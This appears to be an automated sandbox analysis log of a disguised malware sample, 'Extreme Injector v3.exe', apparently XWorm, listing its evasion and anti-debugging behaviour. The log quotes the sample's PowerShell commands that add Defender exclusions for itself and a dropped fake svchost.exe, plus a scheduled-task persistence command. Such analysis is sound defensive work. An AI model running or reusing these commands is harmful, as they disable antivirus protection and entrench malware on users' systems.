                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (89 identical entries)
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries)

                      Malware Analysis System Evasion

                      Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (3 identical entries)
                      Source: Extreme Injector v3.exe, svchost.exe.0.dr | Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Memory allocated: AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Memory allocated: 1A590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1AEA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 2DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1ADE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1C90000 memory reserve | memory write watch (2 identical entries)
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Window / User API: threadDelayed 1472
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Window / User API: threadDelayed 8339
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6435
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3356
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7596
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2018
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7976
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1516
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7381
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2150
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe TID: 3760 | Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 | Thread sleep count: 7976 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164 | Thread sleep count: 1516 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592 | Thread sleep count: 7381 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592 | Thread sleep count: 2150 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7664 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5928 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7892 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File Volume queried: C:\ FullSizeInformation (4 identical entries)
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation (3 identical entries)
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
                      Source: svchost.exe.0.dr | Binary or memory string: vmware
                      Source: Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B370000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Code function: 0_2_00007FFD9B8979E1 CheckRemoteDebuggerPresent,0_2_00007FFD9B8979E1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process token adjusted: Debug (2 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 identical entries)
                      Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2y
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002603000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002624000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Queries volume information: C:\Users\user\Desktop\Extreme Injector v3.exe VolumeInformation
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
